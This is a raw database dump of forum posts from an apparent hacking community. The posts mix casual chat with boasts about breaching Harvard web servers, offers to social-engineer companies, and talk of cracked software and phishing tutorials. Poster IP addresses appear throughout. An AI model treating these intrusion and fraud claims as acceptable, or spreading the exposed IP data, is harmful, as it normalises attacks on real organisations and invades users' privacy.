I\'m puttin this on my site now', '70.192.15.83', '1186991955', '1', '0', '0', '0', '1', '03ecba9e2593ddada6d93a08cef539d1', '0', '0'); INSERT INTO mybb_posts VALUES('3514', '687', '3512', '13', 'RE: [HACKED] mclean.harvard.edu', '0', '223', 'StarZ', '1349476016', '[quote=\'p420\' pid=\'3512\' dateline=\'1349475609\']\r\nNice hacks. You seem to be a pro web hacker. I bet someone will upload a deface but why don\'t you?\r\n[/quote]\r\nI don\'t honestly feel like doing it at the moment, sorry.', '174.127.99.156', '-1367383140', '0', '0', '0', '0', '1', '86b043772527adf1b6d423e8f1df5138', '0', '0'); INSERT INTO mybb_posts VALUES('3515', '679', '3449', '4', 'RE: flamingworm here!', '0', '9', 'p420', '1349476176', 'Welcome amiga ;)\n\nHow did you cum up wid your username?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'a08b5df1395ce4acde7b19ef8280cf76', '0', '0'); INSERT INTO mybb_posts VALUES('3516', '690', '0', '69', 'What are your fav or which coding languages do you know?', '0', '1', 't3h jok3r', '1349477700', 'What are your fav or which coding languages do you know?\r\n\r\nI know PHP, HTML, CSS, a little bit of Java and VB.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2d5e4146a1868e0c0e6732877156d385', '0', '0'); INSERT INTO mybb_posts VALUES('3517', '691', '0', '3', 'Gaming Section Released', '0', '1', 't3h jok3r', '1349479781', 'Finally the long awaited Gaming Section has been added. I had a plan to add more sub-forums and a minecraft forum too but they all are not going to be that active at the moment so added a couple not many.\r\n\r\nLink to Section: http://l33thacking.net/forum-70.html\r\n\r\nYou can visit it by clicking the \"Gaming\" Tab as well. \r\n\r\nAlso, I have added a couple of new sections under the [i]Coding[/i] Section as well.\r\n\r\nHope you like the update, refer all yo game a friends ryt NOW :D\r\n\r\n[u][b]Vocab[/b][/u]\r\n\r\nSection AKA Tab', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0446ad949fac1e88bd02337f3915023e', '0', '0'); INSERT INTO mybb_posts VALUES('3518', '692', '0', '71', 'COD Black OPs or COD MW3?', '0', '5', 'Timmy', '1349480570', 'Which game do you think is better black OPs or Modern Warfare 3?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '473f8ebbfc2493a32c2ce575976650c0', '0', '0'); INSERT INTO mybb_posts VALUES('3519', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349480582', 'Be with someone who won’t stay mad at you, who can’t stand not talking to you, and who’s afraid of losing you.\n\nQuote.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '024f15605e4bdfa43c7532265f2e16c9', '0', '0'); INSERT INTO mybb_posts VALUES('3520', '137', '354', '13', 'RE: [TuT] How to exploit a vulnerable site', '0', '82', 'iTzIpod', '1349480613', 'User is banned so he can\'t reply to that', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd35dbc477a7a11cf687cb0c31be5cb65', '0', '0'); INSERT INTO mybb_posts VALUES('3521', '680', '3457', '35', 'RE: Some of my works...', '0', '82', 'iTzIpod', '1349480645', 'I\'m guessing Photoshop. But not sure which version though.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd8389daec99ff12eea3ce445961894aa', '0', '0'); INSERT INTO mybb_posts VALUES('3522', '691', '3517', '3', 'RE: Gaming Section Released', '0', '82', 'iTzIpod', '1349480737', 'Woot. \n\nHope this section becomes successful.\n\nThanks for the update.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd531edc80167825a2e897f7b48a51131', '0', '0'); INSERT INTO mybb_posts VALUES('3523', '679', '3449', '4', 'RE: flamingworm here!', '0', '82', 'iTzIpod', '1349480769', 'How you spelt \"cum\"... Can\'t stop laughing. LOL', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4f60637d0271dd65894b364b9d6cf1db', '0', '0'); INSERT INTO mybb_posts VALUES('3524', '692', '3518', '71', 'RE: COD Black OPs or COD MW3?', '0', '82', 'iTzIpod', '1349481086', 'How you spell the titles and all....\n\nLool\n\n\nI like Black Ops better than MW3. MW3 = Too much campers.\nBlack Ops = More noobs = Higher K/D ;)\n\n\nPSN: SoaR_iPod, SoaR_Drastic, iTzExtremeiPod\n\nAdd those 3.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd287de21ce8481fe158c72bd2b3fa5a8', '0', '0'); INSERT INTO mybb_posts VALUES('3525', '693', '0', '7', 'Hmmm?', '0', '3', '??????????¢™', '1349481345', 'Hey, is something wrong with the site because for some reason my username is changed and its not even changed to my old one before I changed it to iPownaholic. Could someone tell me whats going on?', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '490ab667334bb0b6390619a34588e5a3', '0', '0'); INSERT INTO mybb_posts VALUES('3526', '691', '3517', '3', 'RE: Gaming Section Released', '0', '3', '??????????¢™', '1349481382', 'Thats great, Now I could make a thread about me hosting a MW3 Knockback lobby.', '75.22.59.99', '1259748195', '1', '0', '3', '1349481392', '1', '82813b267d4684f285a6440955cb4cd6', '0', '1349481392'); INSERT INTO mybb_posts VALUES('3527', '693', '3525', '7', 'RE: Hmmm?', '0', '82', 'iTzIpod', '1349481721', 'No one likes you. Leave right now.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bb97ef61d4bd36abd540876faa6f971a', '0', '0'); INSERT INTO mybb_posts VALUES('3528', '693', '3527', '7', 'RE: Hmmm?', '0', '3', '??????????¢™', '1349481881', '[quote=\'iTzIpod\' pid=\'3527\' dateline=\'1349481721\']\r\nNo one likes you. Leave right now.\r\n[/quote]\r\n\r\nDude I am not leaving, Could you just tell me what happened?', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '79e91a2c39f0ccebf788fd6f87bea1ea', '0', '0'); INSERT INTO mybb_posts VALUES('3529', '693', '3525', '7', 'RE: Hmmm?', '0', '82', 'iTzIpod', '1349481928', 'So now you\'re just acting like you\'re all calm and nothing happened? \n\nGreat. Did you get butthurt and finally got over it?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9d116b1f6f6016c2e3ec7e4d4a00fa43', '0', '0'); INSERT INTO mybb_posts VALUES('3530', '693', '3529', '7', 'RE: Hmmm?', '0', '3', '??????????¢™', '1349482104', '[quote=\'iTzIpod\' pid=\'3529\' dateline=\'1349481928\']\r\nSo now you\'re just acting like you\'re all calm and nothing happened? \r\n\r\nGreat. Did you get butthurt and finally got over it?\r\n[/quote]\r\n\r\nDude I have been over it, but do you know what happened?', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', 'ef9b5796b347f20e13a38fda6c678bb4', '0', '0'); INSERT INTO mybb_posts VALUES('3531', '693', '3525', '7', 'RE: Hmmm?', '0', '82', 'iTzIpod', '1349482264', 'You got demoted. And started complaining like a bitch. I know what happened. And you don\'t know what happened since you don\'t know why your name changed..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '081e4cbbab23a1661b23bee811d536b2', '0', '0'); INSERT INTO mybb_posts VALUES('3532', '693', '3531', '7', 'RE: Hmmm?', '0', '3', '??????????¢™', '1349483431', '[quote=\'iTzIpod\' pid=\'3531\' dateline=\'1349482264\']\r\nYou got demoted. And started complaining like a bitch. I know what happened. And you don\'t know what happened since you don\'t know why your name changed..\r\n[/quote]\r\n\r\nI know that but I dont know why my name was changed to a shitty name?', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '2758f533c6f27fc3f93161f9e4fad906', '0', '0'); INSERT INTO mybb_posts VALUES('3533', '693', '3525', '7', 'RE: Hmmm?', '0', '82', 'iTzIpod', '1349485122', 'Who cares. ipownaholicTM was shitty too. Wasn\'t any difference.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '76b27cd15fd88999cdfb3e20d3691a66', '0', '0'); INSERT INTO mybb_posts VALUES('3534', '680', '3457', '35', 'RE: Some of my works...', '0', '222', 'Exposé', '1349488644', 'I used Photoshop cs6 ofc :D. And thanks guys...', '74.76.76.132', '1246514308', '0', '0', '222', '1349488656', '1', 'e09f978b6c232628f5b5007ebb16b324', '0', '1349488656'); INSERT INTO mybb_posts VALUES('3535', '694', '0', '71', 'Gamers Recruitment', '0', '61', 'NXK', '1349489163', 'I will now accept applications VIA group CP. You can Apply there.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'c78784b4b9a41b2e22300197c35b9b98', '0', '0'); INSERT INTO mybb_posts VALUES('3536', '679', '3449', '4', 'RE: flamingworm here!', '0', '222', 'Exposé', '1349489980', 'Lol haha I do that alot too (not cum hehe) but spell it like that', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '7e718b46ef78af7a0b62d839f9cb4491', '0', '0'); INSERT INTO mybb_posts VALUES('3537', '693', '3525', '7', 'RE: Hmmm?', '0', '222', 'Exposé', '1349490046', 'Lol so much fail in this thread right now (facepalm)', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '6095aba57729acd07de93e12023e599f', '0', '0'); INSERT INTO mybb_posts VALUES('3538', '77', '184', '16', 'RE: Disguise your voice over Skype', '0', '222', 'Exposé', '1349490083', 'Nice thanks for the share. I have a voicechanger already but I\'ll try this one out :D', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '5507f39d263549d48aa6b2220504f01b', '0', '0'); INSERT INTO mybb_posts VALUES('3539', '567', '2811', '16', 'RE: How to SE McDonalds', '0', '222', 'Exposé', '1349490114', 'Haha iv\'e seen this method all over the internet...but thanks :D', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '583b0771ccb7303b093f79fa9e6fef7c', '0', '0'); INSERT INTO mybb_posts VALUES('3540', '695', '0', '16', 'If you need help...i\'m here!', '0', '222', 'Exposé', '1349490202', 'I think I am at a level where I can say I am an experienced SE\'r. I have done companies like alienware, apple, dell (my method) and many more big companies...and ofc the smaller ones.\r\n\r\nIf you guys need help SE\'ing or just need tips let me know and i\'ll do my best to help you guys out!', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '3844fd117fa9dacb62d6b332da8dc273', '0', '0'); INSERT INTO mybb_posts VALUES('3541', '655', '3253', '43', 'RE: ANY CS5 AND SOME CS4 ADOBE SERIALS', '0', '222', 'Exposé', '1349490256', 'Thanks...but I just use a cracked .dll file or whatever and that actually bypasses the activation...', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '955aaac46b57b1408194de2bf0ad530b', '0', '0'); INSERT INTO mybb_posts VALUES('3542', '51', '133', '11', 'RE: DON\'T USE GOOGLE!!!', '0', '222', 'Exposé', '1349490441', 'Lol...does it really matter. Unless your not doing anything illegal you shouldn\'t be worried :D', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', 'a30c75daed61bb391911ee626750ec4e', '0', '0'); INSERT INTO mybb_posts VALUES('3543', '454', '2139', '35', 'RE: L33THacking Logo attempt 2', '0', '222', 'Exposé', '1349490556', 'I like it but its a little too dark. Maybe use the same grey as the BG or something. Don\'t love the black...', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '89069d8c1a48dda1b8578a57411baf24', '0', '0'); INSERT INTO mybb_posts VALUES('3544', '679', '3449', '4', 'RE: flamingworm here!', '0', '61', 'NXK', '1349493359', 'I thought you were the coder from HF also.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '854b79a3e8e1d8fa857dec9b6721e350', '0', '0'); INSERT INTO mybb_posts VALUES('3545', '679', '3449', '4', 'RE: flamingworm here!', '0', '222', 'Exposé', '1349493597', 'Lol everyone thinks that..but I had the username long before he did lol...', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '40e5a63b3d85fa7a0c84e071e45f4b27', '0', '0'); INSERT INTO mybb_posts VALUES('3546', '693', '3525', '7', 'RE: Hmmm?', '0', '1', 't3h jok3r', '1349494975', 'iTzIpod, he did get demoted and was bitching around but how did you feel when you banned on TP etc etc etc?\n\nThat\'s how reborn felt, he planned on staying on LH and becoming HQ and if we don\'t support him neither we would hurt him but also regret giving someone a chance to reform their mistakes. \n\nBTW, I answered your question via PM.\n\nAll members should be treated equally exactly how I treat others equally :D', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '771d313c4e6c565536f8d5f01622ffb4', '0', '0'); INSERT INTO mybb_posts VALUES('3547', '695', '3540', '16', 'RE: If you need help...i\'m here!', '0', '1', 't3h jok3r', '1349495175', 'We actually have a user that needs something SE\'d. He might be willing to pay as well. \n\n\nHelp Thread: http://l33thacking.net/thread-637.html', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '373a291311ddc128659515a3e2b8e007', '0', '0'); INSERT INTO mybb_posts VALUES('3548', '637', '3098', '16', 'RE: I need to SE a gaming keyboard', '0', '222', 'Exposé', '1349495232', 'Do you still need this..I might be able to help you out :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'a4f7e11afe1946b7c01c19761779c96b', '0', '0'); INSERT INTO mybb_posts VALUES('3549', '693', '3546', '7', 'RE: Hmmm?', '0', '3', '??????????¢™', '1349495432', '[quote=\'t3h jok3r\' pid=\'3546\' dateline=\'1349494975\']\r\niTzIpod, he did get demoted and was bitching around but how did you feel when you banned on TP etc etc etc?\r\n\r\nThat\'s how reborn felt, he planned on staying on LH and becoming HQ and if we don\'t support him neither we would hurt him but also regret giving someone a chance to reform their mistakes. \r\n\r\nBTW, I answered your question via PM.\r\n\r\nAll members should be treated equally exactly how I treat others equally :D\r\n[/quote]\r\nThanks man, Well now you see how they treat me now.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '1d7846e89b237baff6b968cff1bb0a19', '0', '0'); INSERT INTO mybb_posts VALUES('3550', '696', '0', '13', '[HACKED] http://content.hks.harvard.edu', '0', '223', 'StarZ', '1349495564', 'Yep, title.\r\n\r\nhttp://pastebin.com/ikRHx6a7', '174.127.99.156', '-1367383140', '0', '0', '0', '0', '1', 'a4861357735878fbac9b647ce158fef2', '0', '0'); INSERT INTO mybb_posts VALUES('3551', '693', '3525', '7', 'RE: Hmmm?', '0', '222', 'Exposé', '1349495575', 'Yes black people should all be treated fairly...lolwut? /me walks away slowly', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '70f5600255b9e8f888342959b886275a', '0', '0'); INSERT INTO mybb_posts VALUES('3552', '117', '296', '46', 'RE: Facebook Phishin* Website [tut]with pictures', '0', '222', 'Exposé', '1349495686', 'Lol iv\'e seen a much simpler version of this tut on HF....:facepalm:. Your version seems a little too complex...', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '44abafec180c24d9de7c224f20b8dbe6', '0', '0'); INSERT INTO mybb_posts VALUES('3553', '696', '3550', '13', 'RE: [HACKED] http://content.hks.harvard.edu', '0', '222', 'Exposé', '1349495787', 'Lol oh shit nice..Why is there only one user shown tho in the log?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'e955e48acb41cf80afb747f6cd4374ae', '0', '0'); INSERT INTO mybb_posts VALUES('3554', '697', '0', '74', 'Who plays Minecraft out here?', '0', '1', 't3h jok3r', '1349495847', 'Curious about how many LH members play Minecraft.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2d559ff482d9cf2d4ec0e6983c03397c', '0', '0'); INSERT INTO mybb_posts VALUES('3555', '682', '3478', '49', 'RE: Hmm', '0', '222', 'Exposé', '1349495892', 'Oh dam we have a she on LH? Proof or GTFO is mah motto :P Hehe jk :P', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'e451f798dce5c33f679252bc77d9891a', '0', '0'); INSERT INTO mybb_posts VALUES('3556', '696', '3553', '13', 'RE: [HACKED] http://content.hks.harvard.edu', '0', '223', 'StarZ', '1349495972', '[quote=\'flamingworm\' pid=\'3553\' dateline=\'1349495787\']\r\nLol oh shit nice..Why is there only one user shown tho in the log?\r\n[/quote]\r\nThere\'s a lot more, trust me.', '174.127.99.156', '-1367383140', '0', '0', '0', '0', '1', '7859a5a9c2a10f6211a4b09e0c306121', '0', '0'); INSERT INTO mybb_posts VALUES('3557', '698', '0', '7', 'Skype group anyone?', '0', '222', 'Exposé', '1349495981', 'Hey since this site is kinda new and all...anyone wanna get a skype group going.... and I don\'t mean like 100 members...just a couple of you active guys and we can chat. Anyone be up for that?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '424a4a46c88b0b320c4d77c3034427f9', '0', '0'); INSERT INTO mybb_posts VALUES('3558', '190', '665', '56', 'RE: Copy and paste game', '0', '222', 'Exposé', '1349496021', 'http://content.hks.harvard.edu/carr/intranet/login.htm ...lol that\'s what I have :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '59335cab2b3ce14ff9578cced08aa7c5', '0', '0'); INSERT INTO mybb_posts VALUES('3559', '699', '0', '47', '[All Members] Advance Member System', '0', '3', '??????????¢™', '1349496029', '[b]Hello all LH members, Today I am here to giveaway an Advanced Member System Source that I bought from codecanyon yesterday. To get this all you have to do is Post below and I will PM you withing 24 hours.\r\nDEMO: http://codecanyon.net/item/advanced-member-system/2333683?ref=nfo23[/b]', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '9f972754c1e391e7c1ca97c266ecf4ad', '0', '0'); INSERT INTO mybb_posts VALUES('3560', '696', '3550', '13', 'RE: [HACKED] http://content.hks.harvard.edu', '0', '222', 'Exposé', '1349496128', 'Oh haha ok...I figured :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'f9ee3c1646e6bd2d111956e51a7fe7f0', '0', '0'); INSERT INTO mybb_posts VALUES('3561', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '222', 'Exposé', '1349496260', 'Isn\'t iPownaholic™ a previous admin or something...and what did he do. Can anyone summarize?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '65661d66f398b0e9170c442d5cf56303', '0', '0'); INSERT INTO mybb_posts VALUES('3562', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '3', '??????????¢™', '1349496325', 'Guys this is all over, I know why I was demoted so now I am all good. Just forget about it.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '12a4546770bb08046e4f5eaae4c2b6d7', '0', '0'); INSERT INTO mybb_posts VALUES('3563', '446', '2058', '28', 'RE: This forum is dead..', '0', '222', 'Exposé', '1349496356', 'I can help advertise the site a little on other forums and that good stuff. What are we using for advertising atm?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'bde665ada5333928179058ec6ffbbc62', '0', '0'); INSERT INTO mybb_posts VALUES('3564', '662', '3561', '7', 'RE: Is this how you treat me?', '0', '1', 't3h jok3r', '1349496458', '[quote=\'flamingworm\' pid=\'3561\' dateline=\'1349496260\']\r\nIsn\'t iPownaholic™ a previous admin or something...and what did he do. Can anyone summarize?\r\n[/quote]\r\n\r\nHe was banned over a misunderstanding a couple of weeks ago and a few days ago he came back and decided to help LH out and I gave him another chance by making him a Staff member but when his ban expired the system took him down to the normal members group instead of keeping him in the staff group so he thought I kicked him out and he got pissed off etc and without waiting for a clarification or an answer to what really happened he created this thread.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c8d210986571bb4f4097768434e8288b', '0', '0'); INSERT INTO mybb_posts VALUES('3565', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '222', 'Exposé', '1349496516', 'Hehe oh..I mean that is understandable....don\'t think you should have raged iPownaholic™ about it tho...', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'a728c28e0f6c3bca86903e3dacdf84ee', '0', '0'); INSERT INTO mybb_posts VALUES('3566', '43', '105', '7', 'RE: How did you find us?', '0', '222', 'Exposé', '1349496585', 'thanks... iTzIpod u secret mod u :P', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '636107768b77d87d3dc7367bf73b121c', '0', '0'); INSERT INTO mybb_posts VALUES('3567', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '3', '??????????¢™', '1349496878', 'Yea I know I made a mistake.\nCould someone please close this thread or junk it please. Thanks', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', 'dc7732d4af5f6e01d783d0d9a5f933aa', '0', '0'); INSERT INTO mybb_posts VALUES('3568', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '222', 'Exposé', '1349496945', 'You should buy elite and then you can close your own thread :P', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '43ddf8f58b176835932675d6b9b80f49', '0', '0'); INSERT INTO mybb_posts VALUES('3569', '662', '3568', '7', 'RE: Is this how you treat me?', '0', '3', '??????????¢™', '1349497230', '[quote=\'flamingworm\' pid=\'3568\' dateline=\'1349496945\']\r\nYou should buy elite and then you can close your own thread :P\r\n[/quote]\r\n\r\nI dont really think I deserve it right now.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '8203a34ca2b44b0e4b81b9daab7eb600', '0', '0'); INSERT INTO mybb_posts VALUES('3570', '190', '665', '56', 'RE: Copy and paste game', '0', '225', 'Graycat', '1349497601', 'Si no solicitaste este cambio de contraseña o crees que recibiste este correo electrónico por error, ponte en contacto con la Ayuda de Origin para recibir asistencia inmediata.', '75.162.63.63', '1268924223', '0', '0', '0', '0', '1', 'bf048ccc8761b15fb5ecb010ebce6bf1', '0', '0'); INSERT INTO mybb_posts VALUES('3571', '690', '3516', '69', 'RE: What are your fav or which coding languages do you know?', '0', '222', 'Exposé', '1349497735', 'I know vb.net, html, php, css , and a little java...haha so almost like you :P', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '1b38d26bf93f50700becef9840848031', '0', '0'); INSERT INTO mybb_posts VALUES('3572', '700', '0', '7', 'I\'m thirsty....what\'s your favorite drinks?', '0', '222', 'Exposé', '1349497812', 'Personally I like Snapple the best. And Mt.Dew ofc...\r\n\r\nWhat do you guys like to drink?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '64886c475fab22c2997dba4da9e2396c', '0', '0'); INSERT INTO mybb_posts VALUES('3573', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '1', 't3h jok3r', '1349498293', 'Thread has been closed upon OPs request.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9870ef77638665f5a3f2b6e6a118e6d2', '0', '0'); INSERT INTO mybb_posts VALUES('3574', '446', '2058', '28', 'RE: This forum is dead..', '0', '1', 't3h jok3r', '1349498353', 'What do you mean by using for advertising? Well we have a lot of forums and content that make us differ from HF and many other hacking communities.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f3d908d496a016c3944912e8e7f30a68', '0', '0'); INSERT INTO mybb_posts VALUES('3575', '690', '3516', '69', 'RE: What are your fav or which coding languages do you know?', '0', '1', 't3h jok3r', '1349498490', 'Oh no. I gotta keep an eye on you now because you are very similar to me.\n\n[list]\n[*] Green Rep\n[*] HQ and active\n[*] Know the same coding languages\n[*] Like the same PS font\n[*] Uhh do you like girls?\n[/list]\n\n\nOT: I\'m not a pro at VB but good enough to work my way out.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '48cb6366b4bd5bf0be390a30ea4c8735', '0', '0'); INSERT INTO mybb_posts VALUES('3576', '446', '2058', '28', 'RE: This forum is dead..', '0', '222', 'Exposé', '1349498504', 'No No No....like what is your advertising strategy. How are you getting the word out about l33thacking.net?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '493e6a8a98bcff504c37f34745d76e4c', '0', '0'); INSERT INTO mybb_posts VALUES('3577', '690', '3516', '69', 'RE: What are your fav or which coding languages do you know?', '0', '222', 'Exposé', '1349498663', 'Ewww girls.....haha JK broski. Nah girls are awesome....how old r u lol. Not to sound weird. I\'m 18.', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '8944a937c82c9e1a69e408711e09136d', '0', '0'); INSERT INTO mybb_posts VALUES('3578', '690', '3577', '69', 'RE: What are your fav or which coding languages do you know?', '0', '1', 't3h jok3r', '1349498728', '[quote=\'flamingworm\' pid=\'3577\' dateline=\'1349498663\']\r\nEwww girls.....haha JK broski. Nah girls are awesome....how old r u lol. Not to sound weird. I\'m 18.\r\n[/quote]\r\n\r\nSorry but I don\'t want to post my real age online.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'babfd11be739af317b08fad2bb3d47e4', '0', '0'); INSERT INTO mybb_posts VALUES('3579', '697', '3554', '74', 'RE: Who plays Minecraft out here?', '0', '222', 'Exposé', '1349498787', 'I don\'t play minecraft but my buddies were saying I should get it for xbox. Idk I still might but meh...', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '1658b6028959fd37f8f4d3d2b9efe088', '0', '0'); INSERT INTO mybb_posts VALUES('3580', '700', '3572', '7', 'RE: I\'m thirsty....what\'s your favorite drinks?', '0', '1', 't3h jok3r', '1349498834', 'For healthy drinks I would say Milo chocolate milk but when it comes to soft drinks then I think pepsi. I like Mountain Dew too but don\'t drink it that much.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '63e939fa329c277ad66404c7f2a93025', '0', '0'); INSERT INTO mybb_posts VALUES('3631', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '3', '??????????¢™', '1349539854', 'Hell yea, I win I win I win.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '25027ecdf96c3bd9580d0456affc9bc1', '0', '0'); INSERT INTO mybb_posts VALUES('3632', '697', '3554', '74', 'RE: Who plays Minecraft out here?', '0', '53', 'sirchamp', '1349539865', 'I play minecraft. I can only play on a few cracked servers since my minecraft is also cracked', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'ce1511240d714d0f652ddcbd42b207eb', '0', '0'); INSERT INTO mybb_posts VALUES('3582', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '222', 'Exposé', '1349498948', 'Lol I haven\'t been here for a week but I wanna create a new group. Can I pl0x. Cause I am so active :P\n[hr]\n[b]Name of group:[/b] Fearless\r\n[b]Group Description:[/b] We are the elite and fearless members of the web. We aren\'t afraid of anything and are made up of hackers, programmers, social engineers , and L33t members.\r\n[b]Group Userbar:[/b] [img]http://i.imgur.com/Wlg3d.gif[/img]\r\n[b]Forum Name:[/b] Fearless? (Not sure what this is)\r\n[b]Forum Icon(34x34):[/b] [img]http://i.imgur.com/eV4fc.png[/img]\r\n[b]Why LH should make this group official:[/b] Well as the leader of the group, I will keep my members that are part of the group active and stay true to it\'s title. We are a l33t group of members and will be the best on the forum!', '74.76.76.132', '1246514308', '1', '0', '222', '1349502666', '1', '5949197501e37bd3cfc05b50546406cd', '0', '0'); INSERT INTO mybb_posts VALUES('3583', '700', '3572', '7', 'RE: I\'m thirsty....what\'s your favorite drinks?', '0', '222', 'Exposé', '1349499325', 'Never heard of Milo Chocolate Milk....:notbad:...', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '5957cf07d19981b8c8ba59b6b6385b02', '0', '0'); INSERT INTO mybb_posts VALUES('3584', '701', '0', '49', 'Change Font in Logo?', '0', '222', 'Exposé', '1349499415', 'I mean the logo doesn\'t look bad but the font looks a little awkward. It\'s really basic and idk. Idk if it\'s just me or maybe it need\'s a cooler font :roflol:', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '8f97a963558090dbb54ade73f68c4809', '0', '0'); INSERT INTO mybb_posts VALUES('3585', '701', '3584', '49', 'RE: Change Font in Logo?', '0', '3', '??????????¢™', '1349499659', 'Yea I think so to, yo man your sig is cool.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '20ea28587466c4beb3fa124fd538dfa3', '0', '0'); INSERT INTO mybb_posts VALUES('3586', '701', '3584', '49', 'RE: Change Font in Logo?', '0', '205', 'mothered', '1349500606', 'Do you mean the logo, or the \"banner?\" (being \"L33thacking\").\r\n\r\nThe logo looks pretty good to me, the banner can do with a little bit of work. Perhaps It\'s a job for all you GFX masters.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '9c9f9c091668d8a6aa71202d10f84cbb', '0', '0'); INSERT INTO mybb_posts VALUES('3587', '679', '3449', '4', 'RE: flamingworm here!', '0', '205', 'mothered', '1349500807', 'I thought you were the original flammingworm from HF.\r\n\r\nIt\'s of no consequence, so It\'s great to have you on board :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'fe88943043e22d10402e6cc0f22e3378', '0', '0'); INSERT INTO mybb_posts VALUES('3588', '700', '3583', '7', 'RE: I\'m thirsty....what\'s your favorite drinks?', '0', '205', 'mothered', '1349500975', '[quote=\'flamingworm\' pid=\'3583\' dateline=\'1349499325\']\r\nNever heard of Milo Chocolate Milk....:notbad:...\r\n[/quote]\r\n\r\nWe have Milo here In Australia, and It\'s nice.\r\n\r\nHonestly, I only drink water and plain milk. No soft drinks (Soda) or alcohol. Water really satisfies my thirst.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'ad4ff81b920f260043a156f33a158ed7', '0', '0'); INSERT INTO mybb_posts VALUES('3589', '63', '149', '23', 'RE: [Guide] - Keylogger Information & Removal - [Guide]', '0', '205', 'mothered', '1349501175', 'This Is extremely well documented and elaborated.\r\n\r\nWell done mate, great work Indeed.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'f31a8c1508ebac4164ef28693786326d', '0', '0'); INSERT INTO mybb_posts VALUES('3590', '701', '3584', '49', 'RE: Change Font in Logo?', '0', '222', 'Exposé', '1349501231', 'Oh I meant the logo...but I haven\'t see the banner...I can work on it if you guys like :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '9cf9572bb8eff4387d9caf3e69231148', '0', '0'); INSERT INTO mybb_posts VALUES('3591', '676', '3427', '12', 'RE: Cracking Tuts/Reverse Enginnering', '0', '205', 'mothered', '1349501384', 'You\'re very welcome Anonymous.\r\n\r\nYes, as I mentioned above, because of the nature of the tools, your AV will definitely alert. There\'s no harm In running them In Sandboxie or a VM.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'f41e3a5c926243a62e6bbe3c217c67fa', '0', '0'); INSERT INTO mybb_posts VALUES('3592', '696', 